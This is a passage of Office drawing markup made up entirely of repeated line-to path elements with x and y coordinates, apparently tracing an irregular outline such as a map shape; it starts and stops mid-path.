                <a:lnTo>
                  <a:pt x="1510" y="7309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520" y="7309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1395" y="7561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1360" y="7669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1335" y="7747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1353" y="7753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1402" y="7721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473" y="7656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1513" y="7639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1500" y="7661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463" y="7694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1431" y="7731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1380" y="7780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1387" y="7837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1337" y="7982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278" y="8154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1225" y="8294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1212" y="8356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1177" y="8455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158" y="8477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1121" y="8588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118" y="8681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101" y="8787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035" y="8999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="993" y="9071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="948" y="9176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906" y="9383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="909" y="9458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="9635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848" y="9778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="820" y="9957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="820" y="10068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800" y="10132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="10209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="779" y="10283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="759" y="10347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="744" y="10359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726" y="10433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715" y="10415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709" y="10505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682" y="10630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677" y="10691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="10761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640" y="10874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668" y="10967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687" y="10989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710" y="11054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727" y="11039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742" y="11061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764" y="11052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="779" y="11076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="11174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="867" y="11226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="916" y="11241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="931" y="11285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959" y="11332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1044" y="11342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165" y="11470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1251" y="11529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="11483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303" y="11445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1367" y="11492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1402" y="11537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468" y="11568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1505" y="11645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1555" y="11660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1576" y="11603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1618" y="11611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1666" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695" y="11679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1729" y="11620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1799" y="11635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1836" y="11687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852" y="11680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1879" y="11569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="11514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="11502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985" y="11559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057" y="11500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2111" y="11499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2143" y="11475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2210" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2224" y="11394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2200" y="11337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2198" y="11260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2198" y="11127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2161" y="11037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2113" y="10938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2092" y="10825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2106" y="10679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2153" y="10549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175" y="10537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212" y="10487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2210" y="10462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2163" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2072" y="10500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1971" y="10510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1875" y="10532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1836" y="10462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1783" y="10364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1720" y="10298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1737" y="10256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724" y="10243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1739" y="10169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1794" y="10110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1838" y="10026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1843" y="9948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1818" y="9933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1762" y="9977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712" y="10085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1720" y="10034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1737" y="9974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1742" y="9903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759" y="9841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1791" y="9807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1820" y="9743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1815" y="9608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1833" y="9541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1826" y="9455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1877" y="9293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1926" y="9155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1949" y="9134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1978" y="9051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2005" y="9123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2059" y="9112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2064" y="9224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107" y="9261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2033" y="9526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996" y="9729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2033" y="9874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038" y="10093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097" y="10273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2205" y="10312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276" y="10367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2298" y="10443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2240" y="10667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321" y="10805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2395" y="10953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2537" y="11194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2673" y="11315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2828" y="11475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3022" y="11626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052" y="11818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3040" y="11956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102" y="12066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3180" y="12308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3190" y="12397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3117" y="12408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3200" y="12717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3276" y="12803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3476" y="12845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3452" y="13007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3397" y="13195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3377" y="13419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3351" y="13754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417" y="14045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3419" y="14155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3412" y="14365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3454" y="14557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3488" y="14660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3515" y="14843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3547" y="15089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3658" y="15310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3718" y="15303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3777" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3910" y="15271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3873" y="15197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3954" y="15124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4028" y="15160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4067" y="14907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4153" y="14800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4168" y="14670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178" y="14453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4244" y="14360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4311" y="14389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4449" y="14406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4528" y="14406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4543" y="14335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4706" y="14308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4836" y="14264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5040" y="14158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5274" y="14151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5375" y="14091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5393" y="13965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5583" y="14012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5684" y="14057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5718" y="14007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5774" y="14045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5812" y="14082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5839" y="14061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5897" y="14121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5964" y="14047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966" y="13973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6104" y="14035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6147" y="14156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161" y="14247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6152" y="14335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6181" y="14438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6269" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6358" y="14667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6327" y="14719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6422" y="14949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6434" y="15113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6348" y="15293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6444" y="15365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6535" y="15409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6737" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6856" y="15306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6912" y="15461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6918" y="15671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6952" y="15877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7013" y="15978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6982" y="16143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7033" y="16250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6969" y="16353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6977" y="16469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6915" y="16601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6890" y="16688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6917" y="16779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6952" y="16700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7031" y="16793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7119" y="16902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7144" y="16981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211" y="17055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7247" y="17126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7223" y="17227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7284" y="17319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7304" y="17442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7403" y="17560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7423" y="17636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7632" y="17794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7800" y="17930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7928" y="17947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7933" y="17903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7864" y="17767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7800" y="17717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7789" y="17631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7772" y="17580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7794" y="17520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7785" y="17422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7713" y="17311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7612" y="17202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7571" y="17178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7482" y="17082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7376" y="17038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7284" y="16931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7258" y="16794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7196" y="16641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7083" y="16606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7080" y="16493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7147" y="16373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7258" y="16173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7289" y="16005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7440" y="16042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7403" y="16160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7553" y="16192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7704" y="16299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7782" y="16478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7848" y="16574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7996" y="16626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8122" y="16739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8066" y="16831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8127" y="16941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8358" y="16840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8511" y="16737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8723" y="16670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8878" y="16589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8915" y="16316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8849" y="16010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8750" y="15863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8597" y="15739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8450" y="15496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8332" y="15298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="15190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8538" y="15055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8780" y="14946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8863" y="14929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9088" y="15015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9043" y="15076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9080" y="15205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9177" y="15207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9248" y="15035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9431" y="15028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9679" y="14964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9780" y="14887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9837" y="14948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9947" y="14879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10142" y="14869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10386" y="14734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10623" y="14579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10783" y="14370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10920" y="14138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11039" y="13943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11132" y="13926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11172" y="13783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11194" y="13635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11098" y="13581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11058" y="13485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11159" y="13434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11159" y="13300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11047" y="13162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10950" y="12995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10889" y="12813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10723" y="12712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802" y="12584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10950" y="12490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11021" y="12391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11233" y="12333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11206" y="12238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11108" y="12234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10975" y="12163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10808" y="12296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10691" y="12243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10687" y="12158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10566" y="12126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492" y="11999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10568" y="11913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10711" y="11906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802" y="11786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10963" y="11657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11086" y="11589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11164" y="11685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11052" y="11813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11084" y="11886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11007" y="11973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11164" y="11919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11268" y="11828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11468" y="11765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11539" y="11812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11623" y="11827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11635" y="11855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11605" y="11958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11618" y="11992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11586" y="12015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11549" y="12100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11591" y="12128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11630" y="12142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11637" y="12177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11680" y="12158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11696" y="12121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11770" y="12152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11882" y="12303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11773" y="12342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11852" y="12529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11834" y="12670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11857" y="12768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11995" y="12741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12111" y="12653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12246" y="12603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12293" y="12495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12271" y="12283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12222" y="12169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12076" y="11963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11987" y="11891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11926" y="11866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11941" y="11844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11940" y="11763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11997" y="11707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12089" y="11667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12137" y="11606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12158" y="11571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12227" y="11520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12207" y="11387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12241" y="11320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12293" y="11249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12347" y="11253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12360" y="11189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12522" y="11027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12620" y="11103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12704" y="11086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12864" y="10946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12928" y="10822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13059" y="10574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13182" y="10322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13194" y="10187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13306" y="9879"/>
